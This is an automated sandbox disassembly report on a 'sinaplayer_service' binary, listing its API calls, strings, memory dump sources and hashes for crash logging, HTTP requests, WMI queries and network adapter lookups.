                                                                                                                                                                                                      • Part of subcall function 003713E0: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,0037155F,?,?,?,?,?,?,003710EA,?,?), ref: 003713FA
                                                                                                                                                                                                      • Part of subcall function 003713E0: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,0037155F,?,?,?,?,?,?,003710EA,?,?), ref: 0037141A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • String ID: %s$)#sinaliveupgrade#[$)- $5$ApnsHTTP.cpp$Connect m_hConnect = $Content-Type: application/octet-streamAccept: */*$EndRequest m_hRequest = $Error:SendRequest failed dwErr:$GET$OpenRequest m_hRequest = $OpenSession m_hSession = $RequestGet bret = $RequestGet url = $SendRequest m_hRequest = $WinInetGet/0.1$X-Interval$catch_exception m_strStatusText = $o
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0AtExitManager@base@@QAE@XZ.BASE ref: 00375FB7
                                                                                                                                                                                                    • ?Init@CommandLine@@SA_NHPBQBD@Z.BASE(00000000,00000000), ref: 00375FBF
                                                                                                                                                                                                      • Part of subcall function 00380320: ?RegisterProvider@PathService@@SAXP6A_NHPAVFilePath@base@@@ZHH@Z.BASE(0037FB30,000003E8,000003F8,00375FCD), ref: 0038032F
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@XZ.BASE ref: 00375FD0
                                                                                                                                                                                                      • Part of subcall function 00375D70: ??0FilePath@base@@QAE@XZ.BASE(8285FFAB), ref: 00375DA0
                                                                                                                                                                                                      • Part of subcall function 00375D70: ?GetTempDir@base@@YA_NPAVFilePath@1@@Z.BASE(?), ref: 00375DB1
                                                                                                                                                                                                      • Part of subcall function 00375D70: ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,sina_player_crashes,00000013), ref: 00375DF4
                                                                                                                                                                                                      • Part of subcall function 00375D70: ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 00375E08
                                                                                                                                                                                                      • Part of subcall function 00375D70: ??1FilePath@base@@QAE@XZ.BASE ref: 00375E11
                                                                                                                                                                                                      • Part of subcall function 00375D70: ??3@YAXPAX@Z.MSVCR120(?), ref: 00375E24
                                                                                                                                                                                                      • Part of subcall function 00375D70: ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 00375E44
                                                                                                                                                                                                      • Part of subcall function 00375D70: ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 00375E55
                                                                                                                                                                                                      • Part of subcall function 00375D70: ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(?), ref: 00375E68
                                                                                                                                                                                                      • Part of subcall function 00375D70: ??1FilePath@base@@QAE@XZ.BASE ref: 00375E7A
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,crash_service_log.txt,00000015), ref: 0037600C
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037601B
                                                                                                                                                                                                      • Part of subcall function 00375EC0: InterlockedCompareExchange.KERNEL32(003AC118,00000001,00000000), ref: 00375EFB
                                                                                                                                                                                                      • Part of subcall function 00375EC0: ??2@YAPAXI@Z.MSVCR120(00000134,?,?,?,003993DB,000000FF), ref: 00375F0A
                                                                                                                                                                                                      • Part of subcall function 00375EC0: ?RegisterCallback@AtExitManager@base@@SAXP6AXPAX@Z0@Z.BASE(00375EA0,00000000), ref: 00375F45
                                                                                                                                                                                                      • Part of subcall function 0037AEC0: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037AF0C
                                                                                                                                                                                                      • Part of subcall function 0037AEC0: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037AF2F
                                                                                                                                                                                                      • Part of subcall function 0037AEC0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037AF69
                                                                                                                                                                                                      • Part of subcall function 0037AEC0: GetCurrentThreadId.KERNEL32 ref: 0037AFA3
                                                                                                                                                                                                      • Part of subcall function 0037AEC0: GetTickCount.KERNEL32 ref: 0037AFC0
                                                                                                                                                                                                      • Part of subcall function 0037AEC0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037AFDD
                                                                                                                                                                                                      • Part of subcall function 0037AEC0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,6C6C56E0), ref: 0037B000
                                                                                                                                                                                                      • Part of subcall function 0037AEC0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,6C6C56E0), ref: 0037B011
                                                                                                                                                                                                      • Part of subcall function 0037AEC0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6C56E0), ref: 0037B02B
                                                                                                                                                                                                      • Part of subcall function 0037AEC0: OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6C56E0), ref: 0037B049
                                                                                                                                                                                                      • Part of subcall function 0037AEC0: ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6C56E0), ref: 0037B058
                                                                                                                                                                                                      • Part of subcall function 0038A4B0: ??0LockImpl@internal@base@@QAE@XZ.BASE(8285FFAB,6C6C56E0,?,00000000,0039B4EB,000000FF,?,0037614C), ref: 0038A50C
                                                                                                                                                                                                      • Part of subcall function 0038AE00: ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,crash_checkpoint.txt,00000014,\\.\pipe\SinaPlayerCrashServices,00000020,8285FFAB,6C6CE380,6C6C56E0,00000000), ref: 0038AEA0
                                                                                                                                                                                                      • Part of subcall function 0038AE00: ??3@YAXPAX@Z.MSVCR120(?), ref: 0038AEB3
                                                                                                                                                                                                      • Part of subcall function 0038AE00: ?ForCurrentProcess@CommandLine@@SAPAV1@XZ.BASE ref: 0038AECF
                                                                                                                                                                                                      • Part of subcall function 0038AE00: ??0FilePath@base@@QAE@ABV01@@Z.BASE(?), ref: 0038AEE3
                                                                                                                                                                                                      • Part of subcall function 0038AE00: ?HasSwitch@CommandLine@@QBE_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.BASE(00000000,dumps-dir,00000009), ref: 0038AF18
                                                                                                                                                                                                      • Part of subcall function 0038AE00: ??3@YAXPAX@Z.MSVCR120(00000000), ref: 0038AF31
                                                                                                                                                                                                      • Part of subcall function 0038AE00: ?GetSwitchValueNative@CommandLine@@QBE?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@3@@Z.BASE(?,00000000,dumps-dir,00000009), ref: 0038AF76
                                                                                                                                                                                                    • ??0LoggingSettings@logging@@QAE@XZ.BASE ref: 00376029
                                                                                                                                                                                                    • ?BaseInitLoggingImpl_built_with_NDEBUG@logging@@YA_NABULoggingSettings@1@@Z.BASE(00000003), ref: 00376051
                                                                                                                                                                                                    • ?SetLogItems@logging@@YAX_N000@Z.BASE(00000001,00000001,00000001,00000000), ref: 0037605F
                                                                                                                                                                                                    • ?GetMinLogLevel@logging@@YAHXZ.BASE ref: 0037606E
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(main.cc,0000003E,00000001), ref: 00376088
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000,?,0039DD2C), ref: 003760A6
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE ref: 003760CC
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@XZ.BASE ref: 003760D1
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(000003EB,?), ref: 003760E0
                                                                                                                                                                                                    • ?GetMinLogLevel@logging@@YAHXZ.BASE ref: 003760ED
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE ref: 00376129
                                                                                                                                                                                                    • ?GetMinLogLevel@logging@@YAHXZ.BASE(?,?), ref: 00376179
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE ref: 003761B8
                                                                                                                                                                                                    • ?GetMinLogLevel@logging@@YAHXZ.BASE ref: 003761D3
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(main.cc,00000054,00000001), ref: 003761F0
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,00000000), ref: 0037620A
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE(?,00000000), ref: 0037621B
                                                                                                                                                                                                      • Part of subcall function 00375EC0: ?WaitForInstance@internal@base@@YAHPAH@Z.BASE(003AC118,?,?,?,003993DB,000000FF), ref: 00375F65
                                                                                                                                                                                                      • Part of subcall function 0037C890: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB,00000000), ref: 0037C8E1
                                                                                                                                                                                                      • Part of subcall function 0037C890: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037C904
                                                                                                                                                                                                      • Part of subcall function 0037C890: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037C93E
                                                                                                                                                                                                      • Part of subcall function 0037C890: GetCurrentThreadId.KERNEL32 ref: 0037C978
                                                                                                                                                                                                      • Part of subcall function 0037C890: GetTickCount.KERNEL32 ref: 0037C995
                                                                                                                                                                                                      • Part of subcall function 0037C890: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037C9B2
                                                                                                                                                                                                      • Part of subcall function 0037C890: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,00000000), ref: 0037C9D5
                                                                                                                                                                                                      • Part of subcall function 0037C890: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,00000000), ref: 0037C9E6
                                                                                                                                                                                                      • Part of subcall function 0037C890: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037CA00
                                                                                                                                                                                                      • Part of subcall function 0037C890: OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037CA1E
                                                                                                                                                                                                      • Part of subcall function 0037C890: ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037CA2D
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00376231
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00376236
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037623B
                                                                                                                                                                                                    • ??1AtExitManager@base@@QAE@XZ.BASE ref: 00376243
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • String ID: could not get DIR_CRASH_DUMPS$crash_service_log.txt$main.cc$ready to process crash requests$session end. return code is $session start. cmdline is [$Vll
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 003975EF: __onexit.MSVCRT ref: 003975F5
                                                                                                                                                                                                      • Part of subcall function 003861E0: ??3@YAXPAX@Z.MSVCR120(?), ref: 00386247
                                                                                                                                                                                                      • Part of subcall function 003861E0: ??3@YAXPAX@Z.MSVCR120(?), ref: 0038626A
                                                                                                                                                                                                    • ?Base64Encode@base@@YAXABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.BASE(?,00000000,6C6C52C0), ref: 00381987
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 003819A3
                                                                                                                                                                                                    • ?ASCIIToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z.BASE(?,?), ref: 003819DF
                                                                                                                                                                                                    • ?WideToUTF8@base@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@3@@Z.BASE(?,?,?), ref: 00381A03
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00381A27
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00381A65
                                                                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00381A7F
                                                                                                                                                                                                    • CoCreateInstance.OLE32(003A33C8,00000000,00000001,003A32F8,?), ref: 00381AC2
                                                                                                                                                                                                      • Part of subcall function 00371DA0: memmove.MSVCR120(?,?,00000001), ref: 00371DCA
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,003AC120,00000000,000000FF), ref: 00382256
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000,003AC120,00000000,000000FF), ref: 00382286
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@$D@std@@U?$char_traits@V?$allocator@V?$basic_string@$BasicPiece@StringU?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$Base64CreateD@2@@std@@D@2@@std@@@D@2@@std@@@1@D@2@@std@@@1@@Encode@base@@F8@base@@InitializeInstanceSecurityW@2@@3@@W@2@@std@@WideWide@base@@__onexitmemmove
                                                                                                                                                                                                    • String ID: ROOT\CIMV2$WQL$h9$h9
                                                                                                                                                                                                    • API String ID: 3807948138-1704756073
                                                                                                                                                                                                    • Opcode ID: cfba5866a9428b9ffc222074c89d72a4c235e021a750f1c4ce16d11a30b3ad1e
                                                                                                                                                                                                    • Instruction ID: ff75d2577a22a37bd41be1d3301e0580de77c0d462d67508d3b7c4645558c8b4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfba5866a9428b9ffc222074c89d72a4c235e021a750f1c4ce16d11a30b3ad1e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23529DB09002289BDF62EB24CC45BDEB7B9BF44314F1001E9E60DAB291DB756E89CF55
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock.MSVCR120(00000007,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?,?), ref: 6C578D7E
                                                                                                                                                                                                      • Part of subcall function 6C55EDD7: EnterCriticalSection.KERNEL32(?,?,6C5EE497,0000000E,6C5EE4F8,0000000C,6C55EC8C), ref: 6C55EDF3
                                                                                                                                                                                                    • __tzname.MSVCR120(6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?,?), ref: 6C578D87
                                                                                                                                                                                                    • _get_timezone.MSVCR120(0000003B,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?,?), ref: 6C578D93
                                                                                                                                                                                                    • _get_daylight.MSVCR120(?,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?,?), ref: 6C578DA5
                                                                                                                                                                                                    • _get_dstbias.MSVCR120(?,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?,?), ref: 6C578DB7
                                                                                                                                                                                                    • ___lc_codepage_func.MSVCR120(6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?,?), ref: 6C578DC5
                                                                                                                                                                                                      • Part of subcall function 6C567060: strlen.MSVCR120(00000000,00000064,00000000,?,6C578DEB,6C578F1C,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000), ref: 6C56707C
                                                                                                                                                                                                      • Part of subcall function 6C567060: strlen.MSVCR120(00000000,00000064,00000000,?,6C578DEB,6C578F1C,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000), ref: 6C56708B
                                                                                                                                                                                                      • Part of subcall function 6C567060: _mbsnbicoll.MSVCR120(00000000,00000000,00000000,00000064,00000000,?,6C578DEB,6C578F1C,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190), ref: 6C5670A7
                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(6C630C00,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?,?), ref: 6C578E0B
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,6C630C04,000000FF,6C5A4437,0000003F,00000000,?), ref: 6C578E84
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,6C630C58,000000FF,1CC48320,0000003F,00000000,?), ref: 6C578EBC
                                                                                                                                                                                                    • __timezone.MSVCR120 ref: 6C578EE3
                                                                                                                                                                                                    • __daylight.MSVCR120 ref: 6C578EED
                                                                                                                                                                                                    • __dstbias.MSVCR120 ref: 6C578EF7
                                                                                                                                                                                                    • strcmp.MSVCR120(00000000,00000000,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?,?), ref: 6C5A66A5
                                                                                                                                                                                                    • free.MSVCR120(00000000,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?,?), ref: 6C5A66BA
                                                                                                                                                                                                    • strlen.MSVCR120(00000000,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?,?), ref: 6C5A66C1
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000001,00000000,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?,?), ref: 6C5A66C8
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?,?), ref: 6C5A6709
                                                                                                                                                                                                    • free.MSVCR120(00000000,00000000,00000000,00000000,00000000,00000000,6C578F20,00000030,6C57915C,6C565B70,00000008,6C566063,00000190,00000190,00000000,?), ref: 6C5A670F
                                                                                                                                                                                                    • strncpy_s.MSVCR120(6C5A4437,00000040,00000000,00000003), ref: 6C5A672A
                                                                                                                                                                                                    • atol.MSVCR120(-00000003), ref: 6C5A6747
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: strlen$ByteCharMultiWidefree$CriticalEnterInformationSectionTimeZone___lc_codepage_func__daylight__dstbias__timezone__tzname_get_daylight_get_dstbias_get_timezone_invoke_watson_lock_malloc_crt_mbsnbicollatolstrcmpstrncpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 427740661-0
                                                                                                                                                                                                    • Opcode ID: 39e248c0bae3803f64e8228eee2755e7b6d57afb574482120c9e3ffb53f96a93
                                                                                                                                                                                                    • Instruction ID: 8466c6f828b1292217bea69c0d158980230f99c960d43a26f1162b56d2d64105
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39e248c0bae3803f64e8228eee2755e7b6d57afb574482120c9e3ffb53f96a93
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34A18071D14345DEDB15CFAACD80A9DBBB8AF46318F14101AE414FBA90DB349C86CB65
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6C575D05: __EH_prolog3.LIBCMT ref: 6C575D0C
                                                                                                                                                                                                      • Part of subcall function 6C575D05: ??2@YAPAXI@Z.MSVCR120(00000090,0000000C,6C57500E,76A191BC,?,00000180,?), ref: 6C575D35
                                                                                                                                                                                                    • ?GetProcessorNodeCount@Concurrency@@YAIXZ.MSVCR120(76A191BC,?,00000180,?), ref: 6C575027
                                                                                                                                                                                                      • Part of subcall function 6C5744E0: __EH_prolog3.LIBCMT ref: 6C5744E7
                                                                                                                                                                                                      • Part of subcall function 6C5744FF: GetNumaHighestNodeNumber.KERNEL32(?,?,6C575034,76A191BC,?,00000180,?), ref: 6C574509
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,76A191BC,?,00000180,?), ref: 6C575059
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6C5750A3
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6C5750BB
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,?), ref: 6C5750D1
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,?,?,00000180,?), ref: 6C5750E4
                                                                                                                                                                                                    • Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 6C575160
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(000000C0), ref: 6C575250
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000088,?,00000000,00000000,?,?,00000000,000000C0,000000C0), ref: 6C5752EB
                                                                                                                                                                                                      • Part of subcall function 6C574F63: ??2@YAPAXI@Z.MSVCR120(0000000C,?,00000000,00000000,00000000,00000000,?,6C5753A3,?,?,?,?,?,?,?,00000000), ref: 6C574F88
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,?,00000000,00000000,?,?,00000000,000000C0,000000C0), ref: 6C5753E5
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000180,?), ref: 6C57542F
                                                                                                                                                                                                    • __crtCreateSemaphoreExW.MSVCR120(00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,?,?,?,?,00000180,?), ref: 6C5754A1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@$H_prolog3NodeQuickmemset$Concurrency::details::Concurrency@@Count@CreateHighestNumaNumberProcessorSemaphoreSet::__crtfree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1225761749-0
                                                                                                                                                                                                    • Opcode ID: 5331614fda895eed7b3c4fd3e6f4ad6a780e4131b8890ae0eacf3b3b73ea953b
                                                                                                                                                                                                    • Instruction ID: aa6bb9b849a1b99147e25f2d2209ab887ed305de410561461d6f48ef6b6c64d4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5331614fda895eed7b3c4fd3e6f4ad6a780e4131b8890ae0eacf3b3b73ea953b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87025A71604701EFD764CF28C884A9ABBE4FF88314F504A2EE59A87B50DB30E855CFA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00381754
                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,00170002,01010101,00000004,?,00000008,?,00000000), ref: 00381791
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 003817DE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                    • String ID: #{ad498944-762f-11d0-8dcb-00c04fc3358c}$%02X$\\.\
                                                                                                                                                                                                    • API String ID: 33631002-1280425602
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCR120 ref: 003860EF
                                                                                                                                                                                                    • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 0038612C
                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00386142
                                                                                                                                                                                                    • GetAdaptersInfo.IPHLPAPI(00000000,00000000), ref: 00386156
                                                                                                                                                                                                    • memcpy.MSVCR120(00000000,00000194,?,00000000,00000000), ref: 00386173
                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00386194
